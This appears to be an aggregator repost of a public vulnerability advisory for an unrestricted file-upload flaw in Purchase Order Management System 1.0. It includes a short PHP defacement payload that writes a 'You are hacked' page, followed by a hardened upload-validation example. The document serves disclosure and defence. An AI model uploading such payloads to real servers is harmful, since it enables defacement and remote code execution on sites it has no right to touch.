Purchase-Order-Management-System-1.0 File-Upload-RCE
2023-12-15 04:24:12 Author: cxsecurity.com (view original) Views: 9


## Title: Purchase-Order-Management-System-1.0 File-Upload-RCE
## Author: nu11secur1ty
## Date: 12/14/2023
## Vendor: https://github.com/oretnom23
## Software: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html#comment-103796
## Reference: https://portswigger.net/web-security/file-upload

## Description:
The `custom-file-label` parameter of the avatar function is vulnerable to unrestricted file upload. The function does not validate the uploaded file correctly, so an attacker can upload a file with any extension to the system and then execute it directly on the server by requesting it with curl, a web browser, etc.

STATUS: HIGH-CRITICAL Vulnerability

[+] Exploit:

```php
<?php
// @nu11secur1ty 2023
$myfile = fopen("hacked.html", "w") or die("Unable to open file!");
$txt = "<p>You are hacked</p>\n";
fwrite($myfile, $txt);
$txt = "<p><p>This is not good for you</p>\n<a href='https://sell.sawbrokers.com/domain/malicious.com/'target='_blank'>You can visit our website for more information!</a></p>\n";
fwrite($myfile, $txt);
fclose($myfile);
?>
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/Purchase-Order-Management-System-1.0/Purchase-Order-Management-System-1.0-File-Upload-RCE)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/12/purchase-order-management-system-10_11.html)

## Time spent: 00:05:00

--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
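The root cause described above is an avatar upload that trusts the client-supplied file name and extension. The following is an added example of how such a handler is hardened; it is not code from the Purchase Order Management System or from the advisory author. The function name `validate_avatar_upload()`, the form field name `avatar`, the 2 MiB size limit and the upload directory are assumptions made for the illustration.

```php
<?php
// Added example (not the vulnerable project's code): a hardened avatar-upload
// handler showing the checks the vulnerable function lacks. The function name,
// the size limit and the directory layout are assumed for this illustration.

// Only image types are acceptable for an avatar; everything else is rejected.
// The stored extension is taken from this map, never from the request.
const ALLOWED_IMAGE_TYPES = [
    IMAGETYPE_PNG  => 'png',
    IMAGETYPE_JPEG => 'jpg',
    IMAGETYPE_GIF  => 'gif',
];

/**
 * Validate one $_FILES entry and move it into $upload_dir under a random name.
 * Returns the stored file name on success, or null when the upload is rejected.
 */
function validate_avatar_upload(array $file, string $upload_dir): ?string
{
    // Reject transport errors and the "no file" case before touching anything.
    if (!isset($file['error']) || $file['error'] !== UPLOAD_ERR_OK) {
        return null;
    }
    // Enforce a size limit independent of php.ini (2 MiB here, an assumed value).
    if (!isset($file['size']) || $file['size'] <= 0 || $file['size'] > 2 * 1024 * 1024) {
        return null;
    }
    // Only accept files that really arrived via HTTP POST; this rejects
    // attempts to point tmp_name at an arbitrary local path.
    if (!isset($file['tmp_name']) || !is_uploaded_file($file['tmp_name'])) {
        return null;
    }
    // Decide the type from the file contents, not from the client-supplied
    // name or MIME type: getimagesize() parses the actual image header.
    $info = @getimagesize($file['tmp_name']);
    if ($info === false || !isset(ALLOWED_IMAGE_TYPES[$info[2]])) {
        return null;
    }
    // Random server-chosen name plus allowlisted extension: "avatar.php",
    // "x.phtml" or "a.php.png" can never be stored as an executable script.
    $ext  = ALLOWED_IMAGE_TYPES[$info[2]];
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest = rtrim($upload_dir, '/') . '/' . $name;

    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        return null;
    }
    // Drop execute bits; the upload directory itself should also have script
    // execution disabled in the web server configuration.
    chmod($dest, 0644);
    return $name;
}

// Usage (assumed form field name 'avatar' and an upload directory kept
// outside the document root so nothing in it is reachable as a script):
$stored = validate_avatar_upload($_FILES['avatar'] ?? [], __DIR__ . '/../uploads');
if ($stored === null) {
    http_response_code(400);
    exit('Upload rejected');
}
echo 'Stored as ' . htmlspecialchars($stored, ENT_QUOTES, 'UTF-8');
```

Two design points matter as much as the checks themselves: the file's type is decided from its bytes via `getimagesize()` rather than from the submitted name, and the server, not the client, chooses both the stored name and the extension. Keeping the upload directory outside the web root (or serving it with script execution disabled) means that even a validation bypass yields a file the server will not execute.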





Source: https://cxsecurity.com/issue/WLB-2023120031
For takedown requests contact: admin#unsafe.sh